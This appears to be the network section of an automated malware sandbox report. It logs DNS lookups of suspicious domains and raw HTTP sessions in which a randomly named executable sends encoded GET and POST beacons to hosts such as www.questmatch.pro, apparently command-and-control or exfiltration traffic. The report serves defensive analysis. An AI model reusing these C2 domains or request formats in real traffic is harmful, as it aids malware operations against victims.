Dec 9, 2024 06:59:02.757468939 CET | 58788 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:59:03.051563025 CET | 53 | 58788 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:59:03.051588058 CET | 53 | 58788 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:59:17.464499950 CET | 65190 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:59:18.189765930 CET | 53 | 65190 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:59:32.605777025 CET | 55640 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:59:33.017011881 CET | 53 | 55640 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 06:59:52.263339043 CET | 49435 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 06:59:52.896472931 CET | 53 | 49435 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 07:00:12.324686050 CET | 53436 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 07:00:12.633774042 CET | 53 | 53436 | 1.1.1.1 | 192.168.2.7
Dec 9, 2024 07:00:27.292718887 CET | 52123 | 53 | 192.168.2.7 | 1.1.1.1
Dec 9, 2024 07:00:27.601069927 CET | 53 | 52123 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 06:56:56.362745047 CET | 192.168.2.7 | 1.1.1.1 | 0xb777 | Standard query (0) | www.zoiheat.xyz | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:56:57.367064953 CET | 192.168.2.7 | 1.1.1.1 | 0xb777 | Standard query (0) | www.zoiheat.xyz | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:13.963654041 CET | 192.168.2.7 | 1.1.1.1 | 0x92cd | Standard query (0) | www.questmatch.pro | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:28.807216883 CET | 192.168.2.7 | 1.1.1.1 | 0x3a07 | Standard query (0) | www.mrpokrovskii.pro | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:44.042133093 CET | 192.168.2.7 | 1.1.1.1 | 0x29ab | Standard query (0) | www.sodatool.site | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:52.375577927 CET | 192.168.2.7 | 1.1.1.1 | 0xdf2a | Standard query (0) | www.tb0.shop | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:00.746124983 CET | 192.168.2.7 | 1.1.1.1 | 0xf560 | Standard query (0) | www.kvsj.net | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:01.757503033 CET | 192.168.2.7 | 1.1.1.1 | 0xf560 | Standard query (0) | www.kvsj.net | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:16.105457067 CET | 192.168.2.7 | 1.1.1.1 | 0x3ea6 | Standard query (0) | www.learniit.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:31.535557985 CET | 192.168.2.7 | 1.1.1.1 | 0x263b | Standard query (0) | www.bankseedz.info | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:46.699250937 CET | 192.168.2.7 | 1.1.1.1 | 0x6449 | Standard query (0) | www.dietcoffee.online | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:01.746284008 CET | 192.168.2.7 | 1.1.1.1 | 0x5140 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:02.757468939 CET | 192.168.2.7 | 1.1.1.1 | 0x5140 | Standard query (0) | www.smartcongress.net | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:17.464499950 CET | 192.168.2.7 | 1.1.1.1 | 0x1012 | Standard query (0) | www.carsten.studio | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:32.605777025 CET | 192.168.2.7 | 1.1.1.1 | 0xc0e7 | Standard query (0) | www.krshop.shop | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:52.263339043 CET | 192.168.2.7 | 1.1.1.1 | 0xd91 | Standard query (0) | www.rysanekbeton.cloud | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:12.324686050 CET | 192.168.2.7 | 1.1.1.1 | 0x577f | Standard query (0) | www.airrelax.shop | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:27.292718887 CET | 192.168.2.7 | 1.1.1.1 | 0x1910 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 06:56:57.457525015 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | www.zoiheat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:56:57.457525015 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:56:57.457525015 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:56:57.503634930 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | www.zoiheat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:56:57.503634930 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:56:57.503634930 CET | 1.1.1.1 | 192.168.2.7 | 0xb777 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:14.421592951 CET | 1.1.1.1 | 192.168.2.7 | 0x92cd | No error (0) | www.questmatch.pro | | 104.21.62.184 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:14.421592951 CET | 1.1.1.1 | 192.168.2.7 | 0x92cd | No error (0) | www.questmatch.pro | | 172.67.138.37 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:29.624012947 CET | 1.1.1.1 | 192.168.2.7 | 0x3a07 | No error (0) | www.mrpokrovskii.pro | | 85.25.177.138 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:44.315646887 CET | 1.1.1.1 | 192.168.2.7 | 0x29ab | Name error (3) | www.sodatool.site | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:57:52.689178944 CET | 1.1.1.1 | 192.168.2.7 | 0xdf2a | Name error (3) | www.tb0.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:01.839505911 CET | 1.1.1.1 | 192.168.2.7 | 0xf560 | No error (0) | www.kvsj.net | | 173.236.199.97 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:01.894903898 CET | 1.1.1.1 | 192.168.2.7 | 0xf560 | No error (0) | www.kvsj.net | | 173.236.199.97 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:16.870870113 CET | 1.1.1.1 | 192.168.2.7 | 0x3ea6 | No error (0) | www.learniit.info | | 203.161.42.73 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:32.284651041 CET | 1.1.1.1 | 192.168.2.7 | 0x263b | No error (0) | www.bankseedz.info | | 46.30.211.38 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:58:47.223709106 CET | 1.1.1.1 | 192.168.2.7 | 0x6449 | No error (0) | www.dietcoffee.online | | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:03.051563025 CET | 1.1.1.1 | 192.168.2.7 | 0x5140 | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:59:03.051563025 CET | 1.1.1.1 | 192.168.2.7 | 0x5140 | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:03.051588058 CET | 1.1.1.1 | 192.168.2.7 | 0x5140 | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:59:03.051588058 CET | 1.1.1.1 | 192.168.2.7 | 0x5140 | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:18.189765930 CET | 1.1.1.1 | 192.168.2.7 | 0x1012 | No error (0) | www.carsten.studio | carsten.studio | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:59:18.189765930 CET | 1.1.1.1 | 192.168.2.7 | 0x1012 | No error (0) | carsten.studio | | 217.160.0.200 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:33.017011881 CET | 1.1.1.1 | 192.168.2.7 | 0xc0e7 | No error (0) | www.krshop.shop | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:33.017011881 CET | 1.1.1.1 | 192.168.2.7 | 0xc0e7 | No error (0) | www.krshop.shop | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 06:59:52.896472931 CET | 1.1.1.1 | 192.168.2.7 | 0xd91 | No error (0) | www.rysanekbeton.cloud | rysanekbeton.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 06:59:52.896472931 CET | 1.1.1.1 | 192.168.2.7 | 0xd91 | No error (0) | rysanekbeton.cloud | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:12.633774042 CET | 1.1.1.1 | 192.168.2.7 | 0x577f | No error (0) | www.airrelax.shop | | 172.67.215.235 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:12.633774042 CET | 1.1.1.1 | 192.168.2.7 | 0x577f | No error (0) | www.airrelax.shop | | 104.21.16.206 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:27.601069927 CET | 1.1.1.1 | 192.168.2.7 | 0x1910 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:00:27.601069927 CET | 1.1.1.1 | 192.168.2.7 | 0x1910 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
• www.zoiheat.xyz
• www.questmatch.pro
• www.mrpokrovskii.pro
• www.kvsj.net
• www.learniit.info
• www.bankseedz.info
• www.dietcoffee.online
• www.smartcongress.net
• www.carsten.studio
• www.krshop.shop
• www.rysanekbeton.cloud
• www.airrelax.shop
• www.vayui.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49766 | 85.159.66.93 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 06:56:57.600594997 CET | 558 | OUT | GET /ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byl HTTP/1.1
Host: www.zoiheat.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 9, 2024 06:56:58.918168068 CET | 225 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Mon, 09 Dec 2024 05:56:58 GMT
Content-Length: 0
Connection: close
X-Rate-Limit-Limit: 5s
X-Rate-Limit-Remaining: 19
X-Rate-Limit-Reset: 2024-12-09T05:57:03.7011834Z


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.749805104.21.62.184805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:14.559535027 CET832OUTPOST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 50 73 55 49 33 6c 67 63 2b 47 73 61 43 51 6b 49 61 35 63 43 41 57 70 64 45 4f 70 54 4c 2b 67 68 39 57 61 68 45 2f 72 77 50 52 35 54 32 4f 2f 52 75 42 47 34 74 4c 52 51 72 65 77 48 73 49 49 2f 77 46 78 38 2b 32 59 45 66 7a 50 4e 54 6c 6f 74 56 45 54 70 45 49 55 62 52 55 35 2b 46 66 63 72 71 6a 77 46 56 74 4b 69 55 75 4a 61 6f 2f 53 46 35 35 53 66 69 52 58 76 72 61 6a 35 65 75 6c 50 56 4f 66 53 4e 6d 47 48 30 72 32 66 70 52 2f 67 30 37 51 74 41 6c 65 31 64 47 7a 62 53 32 78 2f 44 65 68 33 75 2f 79 33 48 49 35 51 43 70 65 48 35 73 58 4d 62 31 31 74 33 75 36 67 75 41 37 70 36 49 70 75 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=hPHW3D6UD6FbXPsUI3lgc+GsaCQkIa5cCAWpdEOpTL+gh9WahE/rwPR5T2O/RuBG4tLRQrewHsII/wFx8+2YEfzPNTlotVETpEIUbRU5+FfcrqjwFVtKiUuJao/SF55SfiRXvraj5eulPVOfSNmGH0r2fpR/g07QtAle1dGzbS2x/Deh3u/y3HI5QCpeH5sXMb11t3u6guA7p6Ipuw==
                                                                                  Dec 9, 2024 06:57:15.822072029 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:15 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 3c7f0a17-6d8d-4fcc-a8fb-8516da71c72d
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2Fa68cddeUFkkBLkpUbhq44aaIa7OoZD%2BWf6uF6HQy0jZcAp2ku9x4E6Dswo9tD7Hou%2B6BvudyeIXv1AXUmWXHi4FC8ue%2FQGZPCRpAuvxPGs5K2bF7sRcxq1anQIOS8SVJTv%2Bfc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1b3bd760f79-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2086&rtt_var=1043&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=832&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0a 83 30 10 45 af 12 66 6d b0 b6 d6 48 0e 50 70 63 0b 75 57 ba 18 33 49 2b 4d 33 10 23 54 c4 bb 17 71 fd 1f ef fd 05 7a a6 19 74 98 bc cf c0 c6 c8 71 04 bd 80 61 b2 a0 cb 43 99 41 c0 af 05 0d 2d 27
                                                                                  Data Ascii: b5$A0EfmHPpcuW3I+M3#TqztqaCA-'
                                                                                  Dec 9, 2024 06:57:15.822108030 CET | 109 | IN | Data Raw: 71 e1 29 10 64 40 36 e1 e0 47 d0 0f 68 59 bc 31 90 b7 51 b8 6d 15 8e a3 b8 5d ef 9d c8 8b f9 67 72 78 ae 1b df 4f af 26 38 de d5 31 5a 8f 69 e0 d0 10 68 38 19 e5 0e 58 28 59 51 4d b2 74 c6 48 ac 5d 2f eb 73 51 11 aa c2 a8 e3 d6 1c 13 9a 4f 17 d1
                                                                                  Data Ascii: q)d@6GhY1Qm]grxO&81Zih8X(YQMtH]/sQO9A#0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  2 | 192.168.2.7 | 49811 | 104.21.62.184 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:57:17.223403931 CET | 852 | OUT | POST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 57 75 63 55 4c 51 78 67 58 2b 47 76 52 69 51 6b 44 36 35 51 43 41 53 70 64 46 37 79 54 35 61 67 76 35 53 61 67 46 2f 72 31 50 52 35 4c 6d 4f 41 53 65 42 33 34 73 33 5a 51 72 53 77 48 76 30 49 2f 31 35 78 38 4e 4f 62 45 50 7a 4a 47 7a 6c 71 79 46 45 54 70 45 49 55 62 52 41 44 2b 46 48 63 72 61 54 77 55 42 35 4a 72 30 75 4b 4c 6f 2f 53 53 70 35 65 66 69 52 31 76 76 43 46 35 64 47 6c 50 52 4b 66 53 38 6d 42 4f 30 72 76 48 4a 51 4e 6d 31 69 6b 31 51 73 6a 76 63 47 74 57 69 47 70 7a 56 66 44 74 4d 7a 65 70 57 77 43 55 41 4e 6f 51 66 78 69 4f 61 78 74 67 56 61 62 2f 5a 6c 52 6b 6f 70 74 34 4a 79 7a 65 73 44 4c 69 65 50 5a 37 59 50 4e 30 59 75 50 78 65 49 3d
                                                                                  Data Ascii: PHM8hj-=hPHW3D6UD6FbWucULQxgX+GvRiQkD65QCASpdF7yT5agv5SagF/r1PR5LmOASeB34s3ZQrSwHv0I/15x8NObEPzJGzlqyFETpEIUbRAD+FHcraTwUB5Jr0uKLo/SSp5efiR1vvCF5dGlPRKfS8mBO0rvHJQNm1ik1QsjvcGtWiGpzVfDtMzepWwCUANoQfxiOaxtgVab/ZlRkopt4JyzesDLiePZ7YPN0YuPxeI=
                                                                                  Dec 9, 2024 06:57:18.480420113 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:18 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 478b1926-0965-4581-a5e4-f5e6b2524868
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D39rVOGc2%2FfKbFS6atmCHO9J%2FMgGJJ0gy0pV0s2K%2BcUueoKEeHwKhy7vkWfhV6sFfUaLT%2FgKlGAz1S5Io7rBeraDcbdj2gX%2F%2BCKizrLOW9%2Fnp45%2FwlMWATFh0fLmsA8r1ymkc2E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1c45c78c407-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 4d 0a 83 30 14 06 af 12 be b5 e2 0f 89 b5 39 40 c1 8d 2d d4 5d e9 22 9a 67 2b 4d f3 20 2a 54 c4 bb 17 71 3d c3 30 2b 5a b6 0b b4 9f 9d 8b 40 21 70 18 a1 57 74 6c 09 5a a6 32 82 37 5f 82
                                                                                  Data Ascii: b6$M09@-]"g+M *Tq=0+Z@!pWtlZ27_
                                                                                  Dec 9, 2024 06:57:18.480447054 CET | 115 | IN | Data Raw: 46 cd 93 b8 f0 ec 2d 22 58 9a cc e0 46 e8 07 6a 16 6f e3 ad a3 20 fa 9d 8a 9e 83 b8 5d ef 8d 48 b2 e5 d7 25 78 6e bb df ce af ca f7 7c a4 43 20 67 a6 81 7d 65 a1 21 4f 65 9b 9d f3 22 4e cf 85 8a a5 2a b3 d8 28 92 71 af a8 68 73 95 cb b2 28 11 61
                                                                                  Data Ascii: F-"XFjo ]H%xn|C g}e!Oe"N*(qhs(aLi?0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  3 | 192.168.2.7 | 49820 | 104.21.62.184 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:57:19.878730059 CET | 1865 | OUT | POST /1yxc/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Referer: http://www.questmatch.pro/1yxc/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 68 50 48 57 33 44 36 55 44 36 46 62 57 75 63 55 4c 51 78 67 58 2b 47 76 52 69 51 6b 44 36 35 51 43 41 53 70 64 46 37 79 54 35 53 67 76 4b 61 61 68 6d 48 72 32 50 52 35 56 32 4f 46 53 65 42 71 34 74 66 64 51 72 75 4f 48 70 77 49 38 58 68 78 31 63 4f 62 4b 50 7a 4a 62 6a 6c 72 74 56 45 47 70 45 5a 64 62 52 51 44 2b 46 48 63 72 59 37 77 55 56 74 4a 74 30 75 4a 61 6f 2f 47 46 35 34 4a 66 6d 39 50 76 76 4f 7a 34 73 6d 6c 50 78 61 66 56 65 2b 42 42 30 72 74 53 4a 51 56 6d 31 65 37 31 51 78 63 76 63 69 54 57 6c 71 70 32 68 47 66 33 76 76 54 39 77 6b 2b 56 69 70 4b 54 4d 68 78 44 5a 5a 7a 6f 45 75 58 31 62 52 2b 67 35 68 32 77 4d 72 51 49 71 50 6b 73 65 32 50 71 4f 75 63 6e 34 32 6c 6e 6f 4a 59 50 73 51 69 51 79 43 4c 39 6c 53 56 56 31 50 61 56 44 59 6e 61 37 47 38 64 79 6c 5a 73 4f 57 5a 4b 4f 6c 38 58 6b 53 66 37 6e 39 52 75 34 41 30 4a 69 69 6c 52 61 69 48 34 30 6c 32 48 71 74 30 38 2f 6e 45 4d 59 51 6f 66 32 68 41 7a 6b 66 30 53 76 32 33 56 30 70 63 44 48 56 53 6c 75 68 32 66 5a [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-= [TRUNCATED]
                                                                                  Dec 9, 2024 06:57:21.145694971 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:20 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 613922b1-bb70-476a-97a1-96f12513948a
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbcTwr%2Bf1AZhFW5NsS2L1pnDxH2yWQiXcSy5p75dxYn8Yyz068soy1BEbfS7kXYfADnfR7vzCVVywgFtYwEedVQSHxEzo9s8xlw95pDW2TiyfOJpWln0oDYUQjd0cf%2BeT4I%2Fk2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1d4fe2a42e7-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0a c2 30 14 05 af 12 de ba 41 53 63 6b 73 00 c1 8d 0a ba 13 17 3f 4d aa c5 98 0f 69 0a 8a f4 ee 52 ba 9e 61 98 1f 2c bb 2f 4c 1c 43 28 e0 53 e2 34 c0 fc d0 b2 f3 30 7a ad 0b 44 7a 7b 18 1c 39 8b 3d 8f d1 a1 80
                                                                                  Data Ascii: b6$A0AScks?MiRa,/LC(S40zDz{9=
                                                                                  Dec 9, 2024 06:57:21.145733118 CET | 106 | IN | Data Raw: f3 99 fa 30 c0 dc 70 64 f1 a4 e8 82 4f a2 9b a9 e8 38 89 f3 e9 72 15 2b f5 fd b4 2b dc a7 d9 b7 e3 e3 10 3b 5e d2 29 f9 40 b9 e7 78 70 30 a8 d4 a6 29 4b ab a4 b5 f5 5a ea ba 22 d9 d4 a4 64 53 75 aa dc aa 4d a3 77 84 02 43 a6 f6 75 4d d4 fa e5 76
                                                                                  Data Ascii: 0pdO8r++;^)@xp0)KZ"dSuMwCuMve0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  4 | 192.168.2.7 | 49829 | 104.21.62.184 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:57:22.529239893 CET | 561 | OUT | GET /1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byl HTTP/1.1
                                                                                  Host: www.questmatch.pro
